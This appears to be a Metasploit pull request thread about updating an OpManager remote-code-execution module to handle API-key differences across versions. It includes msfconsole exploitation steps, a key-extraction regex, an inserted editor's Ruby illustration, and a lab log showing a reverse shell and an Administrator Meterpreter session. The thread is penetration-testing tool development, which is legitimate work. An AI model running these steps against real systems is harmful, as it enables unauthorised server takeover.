
OpManager Version Check #8260

Merged
merged 6 commits into from Jun 20, 2017

Conversation

@cleorun cleorun commented Apr 18, 2017

Checks for the version of the OpManager. For version 11.6 the call for the api key value is different from the one in version 11.0, which stops the current exploit from working on older versions. The rest of the exploit works the same.

For versions 11.5 and up /window.OPM.apiKey
For version 11.0 /window.apiKey

Tested on version 11.0

Verification

  • Start msfconsole
  • use exploit/windows/http/manage_engine_opmanager_rce
  • set RHOST <IP addr of target system running OpManager>
  • exploit
  • Verify you get a working Meterpreter session

@egypt
Contributor

egypt commented Apr 24, 2017

It seems like you could skip the version check by having a more accepting regex in the key check, like so:

if res && res.code == 200 && res.body =~ /window\.(?:OPM\.)?apiKey = "([a-z0-9]+)"/

Am I missing something or does that work?
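The following is an added, stand-alone illustration (editor's code, not code from this PR or from the Metasploit module) of the version-tolerant pattern suggested above: one regex whose optional "OPM." segment covers both the 11.0 markup (window.apiKey) and the 11.5+ markup (window.OPM.apiKey), so no separate version check is needed. The HTML bodies, the key value and the Response struct are constructed stand-ins, not real OpManager output. It also shows why the quantifier on the capture group matters: a capture of a single character never matches a 32-character key.

```ruby
# Added example (editor's, not code from the PR or the Metasploit module).
# A version-tolerant regex in the spirit of the review suggestion, plus a
# demonstration of why the quantifier on the capture group matters.

# Optional "OPM." segment covers 11.5+ (window.OPM.apiKey); without it the
# pattern still matches 11.0 (window.apiKey). Dots are escaped so they only
# match literal dots, and `+` captures the whole key rather than one character.
KEY_RE = /window\.(?:OPM\.)?apiKey\s*=\s*"([a-z0-9]+)"/

# A capture group with no quantifier: it can only ever match a one-character
# key, so it fails against a real-length key (kept here to show the failure).
SINGLE_CHAR_RE = /window\.(?:OPM\.)?apiKey = "([a-z0-9])"/

# Constructed sample responses (not real OpManager output); the key value is a
# made-up 32-character placeholder.
SAMPLE_KEY = '0123456789abcdef0123456789abcdef'
BODY_11_0 = <<~HTML
  <html><head><script>
    window.apiKey = "#{SAMPLE_KEY}";
  </script></head></html>
HTML
BODY_11_5 = <<~HTML
  <html><head><script>
    window.OPM.apiKey = "#{SAMPLE_KEY}";
  </script></head></html>
HTML

# Minimal stand-in for the HTTP response object the module inspects.
Response = Struct.new(:code, :body)

# Returns the API key string, or nil when the page does not carry one.
def extract_api_key(body, pattern = KEY_RE)
  m = pattern.match(body)
  m && m[1]
end

# Mirrors the `res && res.code == 200 && res.body =~ ...` guard from the
# comment: only a successful (200) response is searched for a key.
def api_key_from(res)
  return nil unless res && res.code == 200
  extract_api_key(res.body)
end

if __FILE__ == $PROGRAM_NAME
  puts "11.0 markup : #{extract_api_key(BODY_11_0).inspect}"
  puts "11.5 markup : #{extract_api_key(BODY_11_5).inspect}"
  puts "no key      : #{extract_api_key('<html></html>').inspect}"
  puts "single-char : #{extract_api_key(BODY_11_0, SINGLE_CHAR_RE).inspect}"
end
```

Running the file prints the same key for both markup variants, nil for a page without a key, and nil for the single-character pattern, which is the defect a reviewer should catch before relying on the combined regex.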

@cleorun
Author

cleorun commented Apr 25, 2017

That works and it's way easier; my Ruby is not brilliant (just tested on version 11 of OpManager).

Then it might be healthy to change the target name to reflect other versions, as the exploit is valid for versions 11.0 - 11.6.

Thank you egypt!

@pbarry-r7 pbarry-r7 self-assigned this Jun 20, 2017
@pbarry-r7
Contributor

Updated verification steps above in the description...

@pbarry-r7
Contributor

pbarry-r7 commented Jun 20, 2017

Thanks for this module update, @cleorun! I made a couple of tweaks to this PR, see under the "commits" section.

Verified on Windows Server 2012 with OpManager v11.4 (i.e. window.apiKey) and v11.5 (i.e. window.OPM.apiKey); both worked as expected with similar output:

$ ./msfconsole -q
msf > use exploit/windows/http/manage_engine_opmanager_rce 
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN-SI597APFOFH
OS          : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows

It appears this module is missing a nice documentation markdown file, I'll add it and then land this PR.

@pbarry-r7 pbarry-r7 merged commit 700d392 into rapid7:master Jun 20, 2017
pbarry-r7 added a commit that referenced this pull request Jun 20, 2017
@alrosenthal-r7

Release Notes

A version check for OpManager has been added to the exploits/windows/http/manage_engine_opmanager_rce module. The exploit now uses the appropriate call for the API key value based on the version, which allows it to work on older versions that use a different call.

@alrosenthal-r7 alrosenthal-r7 added the rn-enhancement release notes enhancement label Jun 27, 2017
@pbarry-r7
Contributor

TY, @alrosenthal-r7!

@cleorun
Author

cleorun commented Jun 28, 2017

thank you!
